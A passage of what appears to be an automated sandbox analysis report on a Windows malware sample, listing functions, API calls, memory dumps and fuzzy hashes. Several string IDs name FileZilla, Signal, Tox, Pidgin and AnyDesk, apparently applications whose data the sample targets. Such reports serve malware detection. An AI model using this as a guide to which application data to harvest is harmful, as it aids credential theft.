                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                                                              • Opcode ID: c5423254268babc4adbeec866d4f3c3d1c9d9504704e86636f1309afa355d0fc
                                                                                                                                              • Instruction ID: b5510b1185d0b5d4b1d73177c6ffc23074c4178150c12f31e18a4bcac3e4c917
                                                                                                                                              • Opcode Fuzzy Hash: c5423254268babc4adbeec866d4f3c3d1c9d9504704e86636f1309afa355d0fc
                                                                                                                                              • Instruction Fuzzy Hash: 48C012703C0712B6DA281BB11C8AB6B226AAB48F02F9014B66622E1180CF99E149A03D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 02585695 Relevance: 6.3, APIs: 5, Instructions: 87memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025857F5
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 5310e5342e8035770802910a65f496980a579a6e32d701a0b99c00d6c5a26a3c
                                                                                                                                              • Instruction ID: 4890d1abd1fa312bf21e87ae84d306fc4ed22a1fec6a08febf73b96b968a095b
                                                                                                                                              • Opcode Fuzzy Hash: 5310e5342e8035770802910a65f496980a579a6e32d701a0b99c00d6c5a26a3c
                                                                                                                                              • Instruction Fuzzy Hash: A1410331904301DFEF31AF10D884BA97BA6FF84305F044869ED456F2A1D7B15895CF9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042CFDA Relevance: 6.2, APIs: 4, Instructions: 206stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 0042D00A
                                                                                                                                              • VariantClear.OLEAUT32(0000000C), ref: 0042D122
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClearVariantlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3817854518-0
                                                                                                                                              • Opcode ID: efe1f8e2d027bb539b6952ef50c248406a08c1723eab44b7f766eecb89339f4a
                                                                                                                                              • Instruction ID: f3a95c8978b032038e64618ba00bdc82d4aaf35a1c96e633dbad15f413149c7c
                                                                                                                                              • Opcode Fuzzy Hash: efe1f8e2d027bb539b6952ef50c248406a08c1723eab44b7f766eecb89339f4a
                                                                                                                                              • Instruction Fuzzy Hash: D6711531E0062AEBCB10DFA5F8856AEBBB0FF04310F90855BF81597240D738D951DBA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041B6D9 Relevance: 6.2, APIs: 4, Instructions: 167fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(-0000003C,?,00000000,-0000003C,00000000,0043A978,?,?,?,?,?,0043A478,00000060), ref: 0041B74E
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,0043A478,00000060), ref: 0041B758
                                                                                                                                              • ReadFile.KERNEL32(-00000031,-00000031,00000001,-0000003C,00000000,?,?,?,0043A478,00000060), ref: 0041B818
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,0043A478,00000060), ref: 0041B822
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1948546556-0
                                                                                                                                              • Opcode ID: 06390da874683060d690ec748a49b226ab513b879b92b8ba4dd51f48b54eaf61
                                                                                                                                              • Instruction ID: 8fb20b34bd6ea9d508b8a2884fa3a7e9fde291ada00aec3394d86df409821bcf
                                                                                                                                              • Opcode Fuzzy Hash: 06390da874683060d690ec748a49b226ab513b879b92b8ba4dd51f48b54eaf61
                                                                                                                                              • Instruction Fuzzy Hash: DE51C534A04385DFDF219F58C8807EA7BB4FF52704F5444ABE8618B391D3789986CB9A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004134B5 Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004134D3
                                                                                                                                              • GetDesktopWindow.USER32 ref: 004134E6
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004134F9
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00413506
                                                                                                                                                • Part of subcall function 004266AC: MoveWindow.USER32(?,?,?,00000000,?,?,?,00413647,?,?,?,?,00000000), ref: 004266C8
                                                                                                                                                • Part of subcall function 004266EA: ShowWindow.USER32(?,?,00413650,00000000,?,?,?,?,00000000), ref: 004266F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$DesktopMoveShowVisible
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3835705305-0
                                                                                                                                              • Opcode ID: 88f95af8812bf0e386d89e0ec780856ec7b40cbd2bc964ae238ea1be644fa563
                                                                                                                                              • Instruction ID: 292b2c97d4d6e5fe8d50f3415b5a10e4331aa721d6f93604126fae14dd501043
                                                                                                                                              • Opcode Fuzzy Hash: 88f95af8812bf0e386d89e0ec780856ec7b40cbd2bc964ae238ea1be644fa563
                                                                                                                                              • Instruction Fuzzy Hash: A3511C75A0020AEFCB10DFA8C994DAEB7BAFF88705B544469F506E7250CB35EE41CB64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041BAB2 Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,00419F5B,00000000,?,?,00000001), ref: 0041BB86
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: c01c61b8bf44389ea94e83f765c07d573316c3af947ce38cddeea1b46c53af0d
                                                                                                                                              • Instruction ID: 3e9d655b9880f60b5f09cf0eebf124177ec1137a07b6d6433de88475768fccef
                                                                                                                                              • Opcode Fuzzy Hash: c01c61b8bf44389ea94e83f765c07d573316c3af947ce38cddeea1b46c53af0d
                                                                                                                                              • Instruction Fuzzy Hash: AF51A371900209DFCB11CFA9C980AEEBBF4FF45304F5041ABE911AB255DB349A81CBA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040EBCB Relevance: 6.1, APIs: 4, Instructions: 126windowthreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,00000138,?,?), ref: 0040EC54
                                                                                                                                              • GetBkColor.GDI32(?), ref: 0040EC5D
                                                                                                                                              • GetTextColor.GDI32(?), ref: 0040EC69
                                                                                                                                              • GetThreadLocale.KERNEL32(0000F1C0), ref: 0040ECFB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$LocaleMessageSendTextThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1680304473-0
                                                                                                                                              • Opcode ID: 484771c05116640de967fef7a7e48f7ab1b85b90a13ca1846e652b4cbef55775
                                                                                                                                              • Instruction ID: 0dba9dad94b3284ecc1784028ad6a283dd36c6a39298d9c5ccd4b4294a9626ec
                                                                                                                                              • Opcode Fuzzy Hash: 484771c05116640de967fef7a7e48f7ab1b85b90a13ca1846e652b4cbef55775
                                                                                                                                              • Instruction Fuzzy Hash: 1C51C074600716CFCB10DF26C4449AEB3B0FF04314F10896EE892AB3A1E778E855DB5A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257E26F Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 120memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257E83F: HeapFree.KERNEL32(00000000), ref: 0257E8A4
                                                                                                                                                • Part of subcall function 0257E83F: CloseHandle.KERNEL32(?,0257DC7E), ref: 0257E98C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E2E2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E5E3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E645
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: filezillasignal::
                                                                                                                                              • API String ID: 1910495013-924609054
                                                                                                                                              • Opcode ID: 081cf9d4344114abee22fbb40e3976e7690c30e5a984096dd04f5371cc6f405d
                                                                                                                                              • Instruction ID: d5c2c167d72a189e882d0cca3a86e9c99cab8a4f6d60a4ad0f8bff490184d42b
                                                                                                                                              • Opcode Fuzzy Hash: 081cf9d4344114abee22fbb40e3976e7690c30e5a984096dd04f5371cc6f405d
                                                                                                                                              • Instruction Fuzzy Hash: 24513470A08381CFD730DF14E584B9ABBE1BB89318F10895DE98997251EB319949CF8B
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257E2FC Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 120memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257E83F: HeapFree.KERNEL32(00000000), ref: 0257E8A4
                                                                                                                                                • Part of subcall function 0257E83F: CloseHandle.KERNEL32(?,0257DC7E), ref: 0257E98C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E36F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E5E3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E645
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: signaltox::
                                                                                                                                              • API String ID: 1910495013-1483858761
                                                                                                                                              • Opcode ID: 86607321dfc89ee1129501f962dd4398c02e58c34e787d5435b7abe0913e6b76
                                                                                                                                              • Instruction ID: 2d16c31392efc8d9918af7630d3ab555db26cdb423ec37a8ec001890fe34c5be
                                                                                                                                              • Opcode Fuzzy Hash: 86607321dfc89ee1129501f962dd4398c02e58c34e787d5435b7abe0913e6b76
                                                                                                                                              • Instruction Fuzzy Hash: A9513570A08381CFD734DF14E584B9BBBE1BF89314F10895DE98997251EB31A949CF8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257E389 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 120memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257E83F: HeapFree.KERNEL32(00000000), ref: 0257E8A4
                                                                                                                                                • Part of subcall function 0257E83F: CloseHandle.KERNEL32(?,0257DC7E), ref: 0257E98C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E3FC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E5E3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E645
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: toxpidgin::
                                                                                                                                              • API String ID: 1910495013-2736818546
                                                                                                                                              • Opcode ID: f2ebfac7d6fb111fec3e17beeea44703572aea3f03f6adb6211b2d6db72359e6
                                                                                                                                              • Instruction ID: b4a68451eec8a5e269cc977eee6ab77c4f0ab89a2cd931055dde9933c6a03d7a
                                                                                                                                              • Opcode Fuzzy Hash: f2ebfac7d6fb111fec3e17beeea44703572aea3f03f6adb6211b2d6db72359e6
                                                                                                                                              • Instruction Fuzzy Hash: 7F512570A08381CFD731DF14E584B9ABBE1BF89318F10895DE98997251EB319949CF8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0257E1E2 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 120memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257E83F: HeapFree.KERNEL32(00000000), ref: 0257E8A4
                                                                                                                                                • Part of subcall function 0257E83F: CloseHandle.KERNEL32(?,0257DC7E), ref: 0257E98C
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E255
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E5E3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257E645
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: anydeskfilezilla::
                                                                                                                                              • API String ID: 1910495013-2519904345
                                                                                                                                              • Opcode ID: 0e79be94f39eb7406b9fb8a6747cae6b709778c79e1f9426f591edcce7612fbd
                                                                                                                                              • Instruction ID: 971ce2e769cad35b07e5199813dff823eef8caa4d212278d4a6cb579302ef559
                                                                                                                                              • Opcode Fuzzy Hash: 0e79be94f39eb7406b9fb8a6747cae6b709778c79e1f9426f591edcce7612fbd
                                                                                                                                              • Instruction Fuzzy Hash: 22513570A08381CFD730DF14E584B9ABBE1BF89314F10895DE98997251EB31A949CF8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00427FD8 Relevance: 6.1, APIs: 4, Instructions: 103stringtimeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 00428003
                                                                                                                                              • GetFileTime.KERNEL32(?,?,?,?), ref: 00428025
                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 00428033
                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0042805D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AttributesSizeTimelstrcpyn
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1499663573-0
                                                                                                                                              • Opcode ID: 8ed929e8840cf0571f25e06b926dfc94d164733cbe60adf04c0cc376b6f90c85
                                                                                                                                              • Instruction ID: 0f9157c03447155b879e481d300035be14b4a7e9415b58b015406b8be03fdab5
                                                                                                                                              • Opcode Fuzzy Hash: 8ed929e8840cf0571f25e06b926dfc94d164733cbe60adf04c0cc376b6f90c85
                                                                                                                                              • Instruction Fuzzy Hash: C0415E75600614AFC724DF64E880CABB7F4FF083103508A2EE1A693691EB34F949CB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004112D3 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: d9906cbb21440189adeb46f65e4d7491ee8ad9fd862cf020c2635eacfbbe87dd
                                                                                                                                              • Instruction ID: 33bf42000e96db952560971249c255832eb346404390c0d155027bceb8e5320a
                                                                                                                                              • Opcode Fuzzy Hash: d9906cbb21440189adeb46f65e4d7491ee8ad9fd862cf020c2635eacfbbe87dd
                                                                                                                                              • Instruction Fuzzy Hash: FB313C71A11219FFDB10DFA5C884ADEBBB8FF08714F10812BFA15A6250D774A984CBA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00420BD0 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041E91D: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0041E937
                                                                                                                                                • Part of subcall function 0041E91D: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041E948
                                                                                                                                                • Part of subcall function 0041E91D: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0041E98E
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000064,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420C13
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,004151C7,00000000,00000000,?,0041FB6C,00000000,00000000,00000000,00000000,00000000,?,0041DD55,00000007), ref: 00420C30
